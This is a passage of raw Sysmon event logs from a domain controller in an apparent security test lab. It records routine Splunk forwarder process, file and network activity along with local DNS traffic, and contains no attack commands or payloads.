Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002237957Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.388{05ADC7E1-6D66-603E-8AAA-00000000AD01}15340C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe8.0.2Network monitorSplunk ApplicationSplunk Inc.splunk-netmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=8746B8C1724B67C2B1261446C0CFAA57,SHA256=7EFD09FD383FAA75C5D2990E6DBBFD846AEAA08B7037C7D66B4A0EF2AE0866B3,IMPHASH=7B985F47B35272AD7B5218255ACE7AEC{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002237956Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:54.387{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-PowerShell_OperationalMD5=E01BE66416431F2F3FEE27DAD0B2ECA3,SHA256=EFC09298D2ADEB5510E59C7C99ED66B536AEEE9CD1976EDCCB200F3FB10499BA,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002237955Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:43.400{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60130-false10.0.1.12-8000- 23542300x80000000000000002237954Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:53.997{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8FCAD6DA926C4CB97482E3C25F16AB8C,SHA256=502860E8A8F2261DD0803D1CA6684D3FE8CA80A2748CAF85D886FEF4CB9F381E,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237983Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.934{05ADC7E1-6D67-603E-8CAA-00000000AD01}1140410748C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6025c5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+6020f6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+59e67|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+5b88c|C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe+8e7d70|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237982Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D67-603E-8CAA-00000000AD01}11404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237981Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237980Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237979Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237978Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237977Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-229D-6039-0500-00000000AD01}6361168C:\Windows\system32\csrss.exe{05ADC7E1-6D67-603E-8CAA-00000000AD01}11404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237976Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.747{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D67-603E-8CAA-00000000AD01}11404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002237975Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.748{05ADC7E1-6D67-603E-8CAA-00000000AD01}11404C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe8.0.2Active Directory monitorsplunk ApplicationSplunk Inc.splunk-admon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-admon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=947139F3BB2AB70CAF692A60C7A3A735,SHA256=940554A0170A70F634689CC84B00C51AC0BCF773C9639E1305E3672441FC85C8,IMPHASH=357CEC18833E7FF2ABFB722902B13165{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002237974Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.403{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=9FFFC1871C5554AAEC027894BE8DD197,SHA256=FF7C63D0A83F670B5C6D0260BF541E68EE633ACF0898DC7C41AEA4C519F3D318,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002237973Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.071{05ADC7E1-FB20-603C-5D79-00000000AD01}16523928C:\Windows\system32\conhost.exe{05ADC7E1-6D67-603E-8BAA-00000000AD01}11380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237972Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.069{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237971Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.069{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237970Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.069{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237969Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.069{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002237968Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.068{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D67-603E-8BAA-00000000AD01}11380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002237967Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.068{05ADC7E1-FB1F-603C-5979-00000000AD01}64843560C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{05ADC7E1-6D67-603E-8BAA-00000000AD01}11380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002237966Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.060{05ADC7E1-6D67-603E-8BAA-00000000AD01}11380C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{05ADC7E1-229D-6039-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{05ADC7E1-FB1F-603C-5979-00000000AD01}6484C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x80000000000000002237965Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:55.066{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ECF00F571E2C00B2AF456765CB0F12DB,SHA256=0776FCF0FCA83B6F043A87927AF1143FD6D4BDEB080C1BD3BAE54965F81BFEC0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237985Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:56.769{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=699C7927F8DE11686490371A0BD82511,SHA256=EF66ADD1F5B30DC0C6B4982B7616B72D3952545966A00B000900239662A1DF47,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237984Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:56.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D2955FC7EC7C2CB84FF9E459558F542,SHA256=F91A964B18A30882425044B2B69BC6790803BE67883C56CACA0704B40D3EABA9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237986Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:57.122{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=18724C170DC0F590FCC44D691E68D3CB,SHA256=D7A2334DC393F8FB8232015067141CF4AC8EE5F11864680A93F3A08518B41C06,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237987Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:58.153{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F813ACD2A24926F84B091D0D96CD5FC,SHA256=8057EDB6D372AA378FC0742751B638C5C48C69BB036A06999CFD689A3D768EBF,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002237990Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:49.196{05ADC7E1-FB27-603C-8779-00000000AD01}2272C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-974.attackrange.local60131-false10.0.1.12-8000- 23542300x80000000000000002237989Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:59.171{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B0BF3DC6E3D92B0EE43ABFEB353F985C,SHA256=4610C57A48764D68789B602D62DB78937353FCD4DAE2993C2EBD6D1BFC86A277,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237988Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:59.090{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=379F83D5C0A4DBCAC23AD9B21917CB10,SHA256=96D721700D647E14B82A90A162B5B4E5905C50447385D4376512B5820F2E5330,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237993Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:00.374{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AF449C6A584860C1AD286353EF457546,SHA256=D08F13699B6C2FC3A784258F300891A0E34F003125DBA22794CA5A0610391235,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002237992Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:49.446{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-974.attackrange.local56206- 23542300x80000000000000002237991Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:00.184{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=20E9336B355F867380EAB9530D874B16,SHA256=7391B23AFE5D2406A2350722FA0C30DE5B6520FDA535ECF106DDDC2AE02B88F6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237996Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:01.653{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=62637877B62D8C1E0716AC0D10E78D34,SHA256=ECEA287ED5620F5406CD69FE519ACA7A0FC5765402EF5F791AA2ACEE93359F9A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002237995Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:50.461{05ADC7E1-22AF-6039-2D00-00000000AD01}2664C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1win-dc-974.attackrange.local53domainfalse127.0.0.1win-dc-974.attackrange.local56206- 23542300x80000000000000002237994Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:01.215{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=798A3BD81BCF65A18DDF84FEEB5FC26D,SHA256=7B70281700577DA1AFDFEABD5732E044854F981CCFD0E9A3E0038DE3B5DFB691,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002237997Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:53:02.247{05ADC7E1-FB2E-603C-9079-00000000AD01}4328NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=55686E813811085B2E3A503C35CBAFFC,SHA256=C1C1BD361927299C7F91C7C64F079FD2D82C528024C767781DBA46010E861115,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002238015Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 